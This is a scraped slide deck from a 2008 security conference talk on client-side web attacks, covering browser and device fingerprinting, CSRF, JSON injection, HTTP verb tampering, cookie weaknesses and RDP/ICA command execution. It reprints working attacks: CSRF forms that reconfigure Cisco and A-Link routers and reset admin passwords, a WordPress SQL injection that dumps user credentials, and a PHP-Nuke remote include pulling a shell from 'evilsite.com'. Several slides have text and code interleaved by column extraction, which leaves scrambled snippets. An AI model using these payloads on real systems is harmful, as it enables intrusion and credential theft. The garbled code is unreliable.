Aditya - Hacking Client Side Insecurities - ClubHack2008

Hacking Client Side Insecurities
Club-Hack 2008

Aditya K Sood
Founder , Sec-Niche Security

$whoami
Research Front:
•Founder , SECNICHE Security.
•Independent Security Researcher.
•Lead IS Author and Reviewer for Hakin9 Organization.
•Research Author for USENIX and ELSEVIER Journals.
•Like to do Bug Hunting. Released Advisories to Forefront Companies.
•Active Speaker at Security Conferences.
[EU-Sec-West , XCON [07/08] , XKungFoo[08] , OWASP , Cert-IN etc]
•Team Lead – Evil Fingers Community.
•Projects – CERA, MLABS etc.

Professional Front:
Work as a Security Advisor / Penetration Tester for KPMG Consultancy.


Web 2.0 Application Model


$ AGENDA
[1] Discovering Clients on Internet / Intranet.
Web Application Discovery Protocol
Fingerprinting Embedded Devices.
Rogue Request for HTTP Server Fingerprinting.
JavaScript Based Client Information Retrieval
[2] Client Side Attack Patterns.
Pluggable Protocol Handlers.
JavaScript Jacking  JSON Injections [CSRF]
HTTP Verb Jacking HTTP Verb Tampering.
Insecure Parametric Design of Cookies  Baking with XSS.
War XHR and IFRAME Exploiting Patterns.
Cross Site Request Forging (Embedded Devices)  The High Risk.
Surf Jacking  Jacking HTTPS in Traffic Pool.
[3] Web Virtual Environment [RDP/ CITRIX].
[4] Questions and Answers.


Client Side ! Why?
• User Interface with the Browsers to Access Content Remotely.
• Client System Stores Sensitive Information as Local Cache.
• Scripting – an Intermediate Model of Client Server Relation.
• No Executables Required , Just Manipulation through Scripts.
• Follows the Concept of Spoofing and Hidden Codes.
• Exploitable through JS-Jacking and VBS-Jacking with number of Attacks.
• Browsers – The Bulls Eye , Attacker Prime Target.
• The Concept – Exploitation On the Fly.
• Exploitation Trend Change towards Application.
• Application Level Attacks Easy to Trigger and Execute.


Discovery


Fingerprinting ! Why?
• Discovering Clients leverage lot of Sensitive Information.
• Network and System Configuration is the Target Point to Attack.
• Internet , Search Engines Like Google Projects Plethora of Information.
• Attacking Intranet Requires the Inside Information of Party.
• Garbage Dumps on World Wide Web Servers , A Huge Bonus for Attackers.
• Client Side Supports various Protocols [Weak] for Robust Functionality.
• Insecure Administration of Servers – Configuration Mismanagement.
• Browser Based Insecurities.
• JavaScript Jacking on Client Browsers Reveal State Information of Clients.
• Every Single Element Discovered, Favors the Attack on Client.


Fingerprinting !
 Web Proxy Auto Discovery Protocol.

• Protocol used in Discovering Network Proxy Automatically.
• Configuration File Contains Intranet Addresses Inherently.
• Protocol Dismantle the Manual Configuration to Detect Proxy (PAC) File.
• WPAD Works on DHCP Behavior. [DHCPINFORM Query]
• No DNS Lookup is Required if DHCP Issues a Request.
• Protocol Handler  http://wpad.xxxx.com
• PAC  Proxy Auto Configuration | Proxy Settings for Subnets.
• DHCP Query through  Uniform Resource Locator [URL]
• DNS Query through  wpad.dat , File Located in WPAD Root Directory
• Function  FindProxyForURL()


Fingerprinting !
• Attack Point 
• wpad.dat is Not Stored in a Secure Manner. Should be Placed in Default
Virtual Directory.
• Browsers have Stringency in Making a Request to wpad.dat if Stored in Root
Directory.
• No Referrer Check on the Request to wpad.dat File.
• wpad.dat  When a Request is issued it Redirects the page to Required
Proxy File for Configuration of Browser.
Malicious Redirection Can be Done.
• When a DHCP Request is Issued no DNS Required. WOW ! No DNS Cache
Poisoning is Required.
Rogue DHCP Server on LAN do the Trick.
• Wpad use JavaScript to Set Browsers for Proxy Settings.


Fingerprinting !

# WPAD definition
option wpad code 252 = text;
# Suppress WPAD activity - no cache, no DNS.
option wpad "n000";
# Configure a valid WPAD cache. The n is required for Windows.
# All config below this line is optional.
#option wpad "http://www.example.com/wpad.pacn";
class "MSFT" {
match if substring(option vendor-class-identifier, 0, 4) = "MSFT";
# They put 252 on the DHCPINFORM's, but not on the DHCPREQUEST's
# PRL. So we over-ride the PRL to include 252 = 0xFC, which will also
# suppress the DHCPINFORMS!
option dhcp-parameter-request-list =
concat(option dhcp-parameter-request-list, fc);
}

function FindProxyForURL(url, host)
{
return "PROXY 192.168.0.1:3128 ; DIRECT";
}


Fingerprinting !
 Embedded Devices

• Criticality in Determining the Internal Structure.
• HTTP Request Parameters are Manipulated.
• 301 Moved Permanently Response Code is thrown.
• Devices used to Spoof the Internal IP Addresses.
• Every Device has its Own Working Approach
• Used to Set Cookie in a Different Manner.
• Used to Change the parameter of HTTP Header Specifies.
• Analyzing the change in HTTP Headers Play the Trick.
• Necessary for Application Pen Testing at Infrastructural Level


Fingerprinting !
 Embedded Devices | HTTP Header Manipulation
Case 1:
Response Check 1
Potentially a Net Scalar
HTTP/1.1 200 OKrn Device
Date: Tue, 05 Jul 2007 17:05:18 GMTrn
Server: Serverrn
Vary: Accept-Encoding,User-Agentrn
Content-Type: text/html;
charset=ISO-8859-1rn
nnCoection: closern Transfer-Encoding: chunkedrn
Response Check 2

- send: 'GET /?Action=DescribeImages&AWSAccessKeyId=0CZQCKRS3J69PZ6QQQR2&Owner.1
=084307701560&SignatureVersion=1&Timestamp=2007-02-15T17%3A30%3A13 &Version=2007-01-
03&Signature=<signature removed> HTTP/1.1rnHost: ec2.amazonaws.com:443rnAccept- Encoding:
identityrnrn' reply: 'HTTP/1.1 200 OKrn' header: Server: Apache-Coyote/1.1 header: Transfer-
Encoding: chunked header: Date: Thu, 15 Feb 2007 17:30:13 GMT

 send: 'GET /?Action=ModifyImageAttribute&Attribute=launchPermission&AWSAccessKeyId =0CZQCKRS3J6
9PZ6QQQR2&ImageId=ami-00b95c69&OperationType=add&SignatureVersion=1& Timestamp=2007- 02-
15T17%3A30%3A14&UserGroup.1=all&Version=2007-01-03&Signature=<signature removed>
HTTP/1.1rnHost: ec2.amazonaws.com:443rnAccept-Encoding: identityrnrn' reply: 'HTTP/1.1 400
Bad Requestrn' header: Server: Apache-Coyote/1.1 header: Transfer-Encoding: chunked header: Date: Thu,
15 Feb 2007 17:30:14 GMT header: nnCoection: close


Fingerprinting !
 Embedded Devices | HTTP Header Manipulation
Case 2:

HTTP/1.1 200 OK The Content Parameter is
Date: Tue, 10 July 2007 03:01:36 GMT transformed into XONTENT.
Server: Apache This is Generally Shown by
Connection: close Potential RADWARE
Content-type: text/plain Devices

HTTP/1.0 404 Not Foundrn
Xontent-Length: rn
Server: thttpd/2.25b 29dec2003rn
Content-Type: text/html; charset=iso-8859-1rn
Last-Modified: Tue, 05 Jul 2007 17:01:12 GMTrn
RADWARE
Accept-Ranges: bytesrn Device
Cache-Control: no-cache, no-storern
Date: Tue, 05 Jun 2007 17:01:12 GMTrn
Content-Length: 329rn
Connection: closern


Fingerprinting !
 Embedded Devices | Big IP4 IP Based Session Management
Response Check 1

Cookie: service-http=167880896.12345.0000.
ASPSESSIONIDSSCATCAT = XXXXXXXXXXXXXXXXXXX
Lets dissect the
Converting to Binary:
Pattern of this
Binary ( cookie ) == 00001010000000011010100011000000
Number.

Converting to blocks of 4 
00001010
00000001
10101000
11000000
Convert it into
Decimal to see
00001010  10
00000001  1
what is there.
10101000  168
11000000  192

The Internal IP Dissected is  192.168.1.10
This Layout is specific to Working Devices


Fingerprinting !
 HTTP Servers  Fingerprinting with Rogue Requests

• Fingerprinting HTTP Servers with Rogue Requests.
• Web Servers React Stringently to Different Requests.
• The Response Code can be used to Analyze the Web Server.
• 80% of this Request-Response is Successful.


Fingerprinting !
• Client Side JavaScript Can Leverage Lot of Information of Browser State.

Platform : Win32
OSCPU : undefined
UserAgent : Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3
Language : en-US
AppName : Netscape
AppVersion : 5.0 (Windows; en-US) <script language="javascript"> function
Product : Gecko browserInfo(form) { var txtInfo; txtInfo =
CodeName : 2008092417 "Platform : " + window.navigator.platform
Vendor : + "n" + "OSCPU : " +
VendorSub : window.navigator.oscpus + "n" +
CodeName : Mozilla "UserAgent : " +
History :3 window.navigator.userAgent + "n" +
ScreenW : 1440 "Language : " + window.navigator.language
ScrrenH : 900 + "n" + "AppName : " +
window.navigator.appName + "n" +
"AppVersion : " +
window.navigator.appVersion + "n" +
"Product : " + window.navigator.product +
"n" + "CodeName : " +
window.navigator.productSub + "n" +
"Vendor : " + window.navigator.vendor +
"n" + "VendorSub : " +
window.navigator.vendorSub + "n" +
"CodeName : " +
window.navigator.appCodeName + "n" +
"History : " + window.history.length + "n"
+ "ScreenW : " + window.screen.width +
"n" + "ScrrenH : " +
window.screen.height;
form.txtOutput.value=txtInfo; return; }
</script>


Demonstrations!


Web Chemistry! Wow!


Client Side Exploiting Patterns


Client Side Exploiting Patterns
•Pluggable Protocol Handlers.
•JavaScript Jacking  JSON Injections [CSRF]
•HTTP Verb Jacking HTTP Verb Tampering.
•Insecure Parametric Design of Cookies  Baking with XSS.
•War XHR and IFRAME Exploiting Patterns.
•Cross Site Request Forging through CSS Parameter.
•Cross Site Request Forging (Embedded Devices)  The High
Risk.
•Surf Jacking  Jacking HTTPS in Traffic Pool.


Pluggable Protocol Handlers
•Attack works with XSS etc Vulnerabilities.
•Browsers support for the Application Handlers.
•Third Party Attack Base.

GOOGLE CHROME Browser Support 

protocol_handler": {
"excluded_schemes": {
"afp": true,
"data": true,
"disk": true,
"disks": true,
"file": true,
"hcp": true,
"javascript": true,
"mailto": false,
"ms-help": true,
"news": false,
"nntp": true,
"shell": true,
"snews": false,
"vbscript": true,
"view-source": true,
"vnd": {
"ms": {
"radio": true
}


Java Script Jacking
•JavaScript – The Most Critical and Most Usable Scripting Entity.
•Irrevocably Supported by Every Browsers.
•Active base for Malicious Web Base Content.
•Helps in Diversified Client Side Hacking from the Core.
•Dynamic Generated Object Malfunctioning.
•JS-Jacking  Leveraging System Specific Information.
•Attacker Can query Browser Related Information.
•Active Encoding Attacks Fused with JavaScript.
•DOM Based Calling Pattern for Web Based Attacks.

Website Requires
JavaScript Support. This
anatomy works in both
positive and negative
manner


Java Script Jacking


Java Script Jacking – JSON Injections
JSON Injections  The Serialization Insecurity | Web 2.0
Direct Injections with Encoding.
Everything is treated as String. Apply toJSONObject().
CSRF  A different way to Fuse attack with Notation Objects.
{
"menu":
{
"id": "<img
src="https://books.example.com/clickbuy?book=ISBNhere&quantity=100">",

"value": "<img
src="https://trading.example.com/xfer?from=MSFT&to=RHAT&confirm=Y">",

"popup":
"<scriptsrc="https://www.google.com/accounts/UpdateEmail?service=adsense
&Email=mymail@newmail.net&Passwd=cool&save="></script>"
}
}
Cross Site
} Request Forgery
Structured in
JSON – Google
Ad sense
Layout.


HTTP Verb Jacking
• HTTP  Stateless Protocol. Every Request is Independent of other.
• HTTP supports number of Request.
• HTTP Verb Jacking  Play with HTTP Requests like GET/POST.
• Attack Affect  Applications handling XML Data. Versatile Attack.
• Request Schema is Defined in web.xml file.
• HTTP Request Functionality is Placed in web.xml File.
• Verb Jacking == Verb Tampering.
• Exists for a Long Period of Time. In 2006 , I have released a
• HTTP 1.0 and HTTP 1.1 Plays a Part. paper called Rogue XML
Specifications which list the
potential insecurities in
Major Flaw  HTTP End Point web.xml file.
Check does not Disseminate among http://packetstormsecurity.org/
HTTP Request. Only Parameter papers/general/RogueXMLSpe
Check is Performed. All Verbs are cific.pdf
Allowed.


HTTP Verb Jacking
security-constraint>
<web-resource-collection>
<web-resource-name>drivers</web-resource-name>
The snapshot of web.xml file
<description>
Security constraint for
drivers page for a certain target. The
</description>
security constraint parameter
<url-pattern>/drivers.html</url-pattern>
<http-method>POST</http-method> defines the allowed request.
<http-method>GET</http-method>
</web-resource-collection>
The type of Authentication
<auth-constraint> allowed.
<description>
constraint for drivers
</description>
<role-name>manager</role-name>
</auth-constraint> HTTP Verb Jacking  Manager
</security-constraint> directories will not be Accessed
by GET/POST Request. What
<login-config>
<auth-method>BASIC</auth-method> about HEAD Request.
</login-config>

<security-role>
<role-name>manager</role-name>

J2EE ,JSP , ASP , ASP.NET,PHP etc are based on
configuration files to process the type
of request to handle. [ GET/POST/HEAD etc]


Insecure Parametric Cookies
• Insecure Use of Cookies in Session Management.
• Where the Security State is ? Majority Fails to Instantiate.
• XSS Drags in the Application. Authenticated Cookies can be
Undertaken.
• The Real Cause  Insecure Design of Cookies with Parameters.
Cookie Security Design is Judged by two major factors:
1. Cookie over Secure Channel [HTTPS ]
Cookie Security 2. Cookie Extraction through JavaScript Calls.
Parameter
Check

Cookie Security Parameters are :-
Secure ( boolean)  Allowed over only HTTPS.
HttpOnly ( boolean )  JavaScript document.cookie Fails.


XHR and IFRAME
• XHR  XML HTTP DOM based API for XML Data Transference.
• Active Mechanism based on AJAX.
• XHR Request does not Cached in the History of Browser.
• IFRAME Requests have a proper History Caching Layout.
• XHR Requests are Irreversible. IRAME is totally Reverse.
• Working Functionality of both are Different from Each other.
• Number of Client Side Attacks are Exploited by using these Elements.

If your browser do not support Ajax XHR request and a page is loaded into
browser then the most of the remote toolkits have a hidden iframe to provide fake
XHR support to the page.


XHR and IFRAME
<script > var iframe =
var oRequest = new XMLHttpRequest(); document.createElement("IFRAME");
var sURL = iframe.setAttribute("src",
"http://www.snapdrive.net/files/571814/chrome.txt";
'ftp://localhost/anything');
alert('Downloading a txt file..please wait.');
oRequest.open("GET",sURL,false); iframe.setAttribute("name", 'myiframe');
oRequest.setRequestHeader("User- iframe.setAttribute("id", 'myiframe');
Agent",navigator.userAgent); iframe.setAttribute("onload",
oRequest.send(null); 'read_iframe("myiframe")');
xmlDoc=oRequest.ResponseText; iframe.style.width = "100px";
alert(xmlDoc); iframe.style.height = "100px";
if (oRequest.status==200)
{ alert('Done...now try editing the Text-Box!'); document.body.appendChild(iframe);
Konqueror 3.5.5 Crash [Milw0rm]
var str=" Winget 3.0 DoS Exploit PoC.Minimize Winget & Right-
Click & Copy to clipboard.";
document.write(str.link("http://"+oRequest.responseText+".ex
e"));

}
else
{alert('Error executing XMLHttpRequest call!');}

Local Dos [Milw0rm]
[PHP Nuke IFRAME]
http://www.example.com/nuke_path/iframe.php?file
=ftp://user:pass@evilsite.com/public_html/shell.html

(or) .htm
[Word Press SQL Injection through IFRAME]
wp-
content/plugins/st_newsletter/stnl_iframe.php?newsletter=
-
9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x
3a,user_email)+FROM+wp_users--

http://www.milw0rm.com/exploits/6777
http://www.milw0rm.com/exploits/3512

Embedded Devices - CSRF
[1] Cisco Router Remote Administration Execution CSRF Exploit [Milw0rm]
<html> <body> <body onload="fdsa.submit();">
<form name=fdsa method="post" action="http://10.10.10.1/level/15/exec/-/configure/http">
<input type=hidden name=command value="alias exec xx xx">
<input type=hidden name=command_url value="/level/15/exec/-">
<input type=hidden name=new_command_url value="/level/15/configure/-">

</body> </html>

[3] EXPLAY CMS CSRF Exploit
<img src="http://explay.localhost/admin.php?name

=users&page=1&order=user_id&set_admin=2" />

[2] A-Link WL54AP3 and WL54AP2 CSRF [Milw0rm]
<html> <body onload="document.wan.submit();
document.password.submit()">
<form action="http://192.168.1.254/goform/formWanTcpipSetup" method="post"
name="wan"> <input type="hidden" value="dnsManual" name="dnsMode" checked> <input
type="hidden" name="dns1" value="216.239.32.10">
<input type="hidden" name="dns2" value="216.239.32.10">
<input type="hidden" name="dns3" value="216.239.32.10">
<input type="hidden" name="webWanAccess" value="ON" checked="checked"> </form>
<form action="http://192.168.1.254/goform/formPasswordSetup" method="post"
name="password"> <input type="hidden" name="username" value="mallory"> <input
type="hidden" name="newpass" value="gotroot">

<input type="hidden" name="confpass" value="gotroot"> </form> </body> </html>


SURF Jacking – HTTPS at Stake
•Vulnerable Play with HTTPS Websites.
•Surf Jacking [HTTPS] is an Outcome from Side Jacking [HTTP].
•Basic Flaw is In Cookie Setting by Respective Servers.
•All Insecure Cookie Based Website at Risk. Side Jacking
discovered by Errata
Security.

Surf Jacking
discovered by Enable
Security

But Cookie Insecurity
is known back time.

Greets to break down
into Attacks.


RDP / ICA – Command Execution
• Virtual Environment for Clients to Produce Interface with Servers.
• Executing Commands and GUI Operations Generically.
• ICA  Independent Computing Architecture , CITRIX Applications
• RDP  Remote Desktop Protocol , Microsoft Proprietary Protocol.
• Basically , Virtual Desktop Working Functionality.
• Protocols Defined have Different Working Behavior for ICA and RDP
• Application ( RDP )  MTS i.e. Microsoft Terminal Services.
• Clients Exist for almost all Platforms [*Nix, Windows etc].
• ICA  Similar to X Window System / XEN Virtual Environment.
• RDP Client  RDC + TSC
RDC  Remote Desktop Connection.
TSC  Terminal Services Connection.


RDP / ICA
Citrix Web ICA File: Webica.ini

• Trusted and Un-trusted Distinction  Client Modeling Check.
• It depicts the trusted behavior of ICA Client from its Origin Point using the
webica.ini file.
• Trusted ( ICA Client )  Program Neighborhood / PN Agent.
• Un-Trusted ( ICA Client )  Web Interface / Direct ICA File Execution.

 Structured Dependency over webica.ini file. It is used to set Access Rights.

Citrix Application Server File: Appsrv.ini

• Custom ICA Connections are defined in it.
• Information about Entries in Remote Connection Manager.


Attack Point - ICA
Citrix Desktop Connection parameters provide a functionality to feed a specific
Command which will get executed when a connection is initiated to the server
by the client. Usually instead of the desktop the command gets executed.

• [ApplicationServers]
• Desktop=
•
• [Desktop]
• TransportDriver=TCP/IP
• BrowserProtocol=UDP
• DesiredHRES=4294967295
• DesiredVRES=4294967295
• ScreenPercent=0
• DoNotUseDefaultCSL=Off
• Description=Desktop
• Address=citrix.msdsb.net
• InitialProgram=#ROGUE or MALICIOUS COMMAND
• IconPath=M:Program FilesCitrixICA Clientpn.exe
• IconIndex=1
• ConnectType=1
• MaximumCompression=Off
• UseAlternateAddress=0
• Compress=On

.


Attack Point - RDP
Microsoft Terminal Services RDP has inbuilt option of executing
command through shell directly which is a possible attack
point of Infection.
• screen mode id:i:1
• desktopwidth:i:800
• desktopheight:i:600
• session bpp:i:16
• winposstr:s:0,3,0,0,800,572
• full address:s:www.intlogistics.com
• alternate shell:s: Malicious or rogue Command
• compression:i:1
• keyboardhook:i:2
• audiomode:i:0
• redirectdrives:i:0
• redirectprinters:i:1
• redirectcomports:i:0
• redirectsmartcards:i:1
• displayconnectionbar:i:1
• autoreconnection enabled:i:1
• username:s:freight

.


Questions


Thanks and Regards


SecNiche Security
http://www.secniche.org


Aditya - Hacking Client Side Insecurities - ClubHack2008

More Related Content

What's hot (20)

Viewers also liked (19)

Similar to Aditya - Hacking Client Side Insecurities - ClubHack2008 (20)

More from ClubHack (20)

Aditya - Hacking Client Side Insecurities - ClubHack2008